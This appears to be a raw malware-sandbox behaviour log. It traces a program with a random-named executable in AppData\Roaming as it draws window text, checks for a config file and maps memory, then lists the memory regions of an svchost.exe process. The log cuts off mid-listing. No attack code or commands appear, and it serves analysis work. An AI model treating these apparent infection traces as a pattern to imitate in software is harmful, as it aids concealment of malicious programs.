[0275.037] GetMapMode (hdc=0x1001020d) returned 1
[0275.038] GetTextMetricsW (in: hdc=0x1001020d, lptm=0x16ee5c | out: lptm=0x16ee5c) returned 1
[0275.041] DrawTextExW (in: hdc=0x1001020d, lpchText="Chipu and Co.", cchText=13, lprc=0x16ef68, format=0x2400, lpdtp=0x23e02f8 | out: lpchText="Chipu and Co.", lprc=0x16ef68) returned 24
[0275.061] AdjustWindowRectEx (in: lpRect=0x16f054, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f054) returned 1
[0275.077] AdjustWindowRectEx (in: lpRect=0x16efb8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efb8) returned 1
[0275.077] GdipGetFamilyName (in: family=0x57f358, name=0x16ef80, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0275.077] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.078] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.078] CreateFontIndirectW (lplf=0x722330) returned 0xa0a0206
[0275.078] CoTaskMemFree (pv=0x722330)
[0275.078] GetObjectW (in: h=0xa0a0206, c=92, pv=0x16ef44 | out: pv=0x16ef44) returned 92
[0275.078] SelectObject (hdc=0x1001020d, h=0xa0a0206) returned 0x50a0208
[0275.078] DeleteObject (ho=0x50a0208) returned 1
[0275.078] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e159c | out: psizl=0x23e159c) returned 1
[0275.079] AdjustWindowRectEx (in: lpRect=0x16f090, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f090) returned 1
[0275.079] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x16f158) returned 0x0
[0275.080] GdipCreateFont (fontFamily=0x4fab598, emSize=0x417c0000, style=1, unit=0x3, font=0x23e16bc) returned 0x0
[0275.080] GdipGetFontSize (font=0x4ff02b8, size=0x23e16c0) returned 0x0
[0275.080] AdjustWindowRectEx (in: lpRect=0x16ef70, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef70) returned 1
[0275.080] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef38, language=0x409 | out: name="Arial") returned 0x0
[0275.080] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.080] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.080] CreateFontIndirectW (lplf=0x722330) returned 0x60a0208
[0275.080] CoTaskMemFree (pv=0x722330)
[0275.080] GetObjectW (in: h=0x60a0208, c=92, pv=0x16eefc | out: pv=0x16eefc) returned 92
[0275.080] SelectObject (hdc=0x1001020d, h=0x60a0208) returned 0xa0a0206
[0275.081] DeleteObject (ho=0xa0a0206) returned 1
[0275.081] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1928 | out: psizl=0x23e1928) returned 1
[0275.081] AdjustWindowRectEx (in: lpRect=0x16f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f048) returned 1
[0275.081] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.081] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.081] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.081] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.081] CreateFontIndirectW (lplf=0x722330) returned 0xb0a0206
[0275.081] CoTaskMemFree (pv=0x722330)
[0275.081] GetObjectW (in: h=0xb0a0206, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.082] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1b20 | out: psizl=0x23e1b20) returned 1
[0275.082] DeleteObject (ho=0xb0a0206) returned 1
[0275.082] AdjustWindowRectEx (in: lpRect=0x16f0dc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f0dc) returned 1
[0275.082] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.082] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.082] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.082] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.082] CreateFontIndirectW (lplf=0x722330) returned 0xc0a0206
[0275.082] CoTaskMemFree (pv=0x722330)
[0275.082] GetObjectW (in: h=0xc0a0206, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.082] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e1d14 | out: psizl=0x23e1d14) returned 1
[0275.083] DeleteObject (ho=0xc0a0206) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16ef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef7c) returned 1
[0275.083] DrawTextExW (in: hdc=0x1001020d, lpchText="LMS", cchText=3, lprc=0x16ef68, format=0x2400, lpdtp=0x23e1da0 | out: lpchText="LMS", lprc=0x16ef68) returned 24
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f054, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f054) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0275.083] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0275.085] AdjustWindowRectEx (in: lpRect=0x16f13c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16f13c) returned 1
[0275.085] GetSystemMetrics (nIndex=59) returned 1460
[0275.085] GetSystemMetrics (nIndex=60) returned 920
[0275.085] GetSystemMetrics (nIndex=34) returned 132
[0275.085] GetSystemMetrics (nIndex=35) returned 38
[0275.086] AdjustWindowRectEx (in: lpRect=0x16f03c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16f03c) returned 1
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.086] GetCurrentThreadId () returned 0x534
[0275.087] GetCurrentThreadId () returned 0x534
[0275.087] GetCurrentThreadId () returned 0x534
[0275.088] CreateCompatibleDC (hdc=0x0) returned 0xd010206
[0275.089] GetDC (hWnd=0x0) returned 0x70101c6
[0275.090] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x16ef78) returned 0x0
[0275.090] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.090] GdipGetLogFontW (font=0x4ff0960, graphics=0x50e3340, logfontW=0x722330) returned 0x0
[0275.091] CoTaskMemFree (pv=0x722330)
[0275.091] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.091] CoTaskMemFree (pv=0x722330)
[0275.091] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.092] CoTaskMemFree (pv=0x722330)
[0275.092] GdipDeleteGraphics (graphics=0x50e3340) returned 0x0
[0275.092] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0275.092] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.092] CreateFontIndirectW (lplf=0x722330) returned 0x30a0207
[0275.092] CoTaskMemFree (pv=0x722330)
[0275.093] SelectObject (hdc=0xd010206, h=0x30a0207) returned 0x18a002e
[0275.093] GetTextMetricsW (in: hdc=0xd010206, lptm=0x16f084 | out: lptm=0x16f084) returned 1
[0275.093] GetTextExtentPoint32W (in: hdc=0xd010206, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x23e226c | out: psizl=0x23e226c) returned 1
[0275.093] SelectObject (hdc=0xd010206, h=0x18a002e) returned 0x30a0207
[0275.094] DeleteDC (hdc=0xd010206) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f064, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f064) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16eec8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16eec8) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.094] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f064, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f064) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16eec8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16eec8) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ece4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ece4) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16f028, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f028) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ee8c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ee8c) returned 1
[0275.095] AdjustWindowRectEx (in: lpRect=0x16ece4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ece4) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16edd8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16edd8) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16effc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16effc) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ed50, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16ed50) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ee34, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x16ee34) returned 1
[0275.096] GetSystemMetrics (nIndex=34) returned 132
[0275.096] GetSystemMetrics (nIndex=35) returned 38
[0275.096] AdjustWindowRectEx (in: lpRect=0x16efbc, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16efbc) returned 1
[0275.096] AdjustWindowRectEx (in: lpRect=0x16ee20, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16ee20) returned 1
[0275.140] EtwEventRegister () returned 0x0
[0275.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16e980, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0275.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16ebc8) returned 1
[0275.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16ee8c | out: lpFileInformation=0x16ee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0275.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16ebc4) returned 1
[0275.948] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x248
[0275.949] memcpy (in: _Dst=0x4c0000, _Src=0x23f5248, _Size=0xfa00 | out: _Dst=0x4c0000) returned 0x4c0000
[0275.950] CloseHandle (hObject=0x248) returned 1
Thread:
id = 124
os_tid = 0x6a0
Thread:
id = 125
os_tid = 0x65c
[0273.122] CoGetContextToken (in: pToken=0xc0f67c | out: pToken=0xc0f67c) returned 0x800401f0
[0273.122] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 126
os_tid = 0x314
Thread:
id = 127
os_tid = 0x6d4
Thread:
id = 128
os_tid = 0x328
Process:
id = "9"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x244d2000"
os_pid = "0x34c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "7"
os_parent_pid = "0x1c8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dd0a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2493
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2494
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 2495
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2496
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2497
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2498
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2499
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2500
start_va = 0x1d0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2501
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2502
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2503
start_va = 0x200000
end_va = 0x200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 2504
start_va = 0x210000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2505
start_va = 0x290000
end_va = 0x417fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 2506
start_va = 0x420000
end_va = 0x420fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 2507
start_va = 0x430000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2508
start_va = 0x530000
end_va = 0x6b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 2509
start_va = 0x6c0000
end_va = 0x77ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006c0000"
filename = ""
Region:
id = 2510
start_va = 0x780000
end_va = 0x78afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 2511
start_va = 0x790000
end_va = 0x79cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2512
start_va = 0x7a0000
end_va = 0x7a3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 2513
start_va = 0x7b0000
end_va = 0x7b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 2514
start_va = 0x7c0000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 2515
start_va = 0x7d0000
end_va = 0x7d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 2516
start_va = 0x7e0000
end_va = 0x7e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2517
start_va = 0x7f0000
end_va = 0x7f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 2518
start_va = 0x800000
end_va = 0x87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 2519
start_va = 0x880000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db")
Region:
id = 2520
start_va = 0x8b0000
end_va = 0x8b3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2521
start_va = 0x8c0000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2522
start_va = 0x940000
end_va = 0x94dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2523
start_va = 0x950000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 2524
start_va = 0x9f0000
end_va = 0xa6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009f0000"
filename = ""
Region:
id = 2525
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 2526
start_va = 0xa90000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 2527
start_va = 0xb10000
end_va = 0xb8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 2528
start_va = 0xba0000
end_va = 0xc1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ba0000"
filename = ""
Region:
id = 2529
start_va = 0xc20000
end_va = 0xeeefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2530
start_va = 0xf10000
end_va = 0xf8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 2531
start_va = 0xfa0000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 2532
start_va = 0x1080000
end_va = 0x10fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 2533
start_va = 0x1110000
end_va = 0x118ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 2534
start_va = 0x1190000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001190000"
filename = ""
Region:
id = 2535
start_va = 0x1270000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001270000"
filename = ""
Region:
id = 2536
start_va = 0x12f0000
end_va = 0x1355fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2537
start_va = 0x1380000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 2538
start_va = 0x1400000
end_va = 0x147ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2539
start_va = 0x14a0000
end_va = 0x151ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014a0000"
filename = ""
Region:
id = 2540
start_va = 0x1520000
end_va = 0x159ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001520000"
filename = ""
Region:
id = 2541
start_va = 0x15c0000
end_va = 0x163ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015c0000"
filename = ""
Region:
id = 2542
start_va = 0x16b0000
end_va = 0x172ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016b0000"
filename = ""
Region:
id = 2543
start_va = 0x1750000
end_va = 0x17cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 2544
start_va = 0x1820000
end_va = 0x189ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001820000"
filename = ""
Region:
id = 2545
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2546
start_va = 0x19c0000
end_va = 0x1abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019c0000"
filename = ""
Region:
id = 2547
start_va = 0x1ac0000
end_va = 0x1bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ac0000"
filename = ""
Region:
id = 2548
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2549
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2550
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2551
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2552
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2553
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2554
start_va = 0xff5b0000
end_va = 0xff5bafff
monitored = 0
entry_point = 0xff5b246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2555
start_va = 0x7fefa490000
end_va = 0x7fefa498fff
monitored = 0
entry_point = 0x7fefa4911a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2556
start_va = 0x7fefa700000
end_va = 0x7fefa776fff
monitored = 0
entry_point = 0x7fefa70afd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 2557
start_va = 0x7fefa780000
end_va = 0x7fefa78efff
monitored = 0
entry_point = 0x7fefa787e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 2558
start_va = 0x7fefa790000
end_va = 0x7fefa799fff
monitored = 0
entry_point = 0x7fefa79260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2559
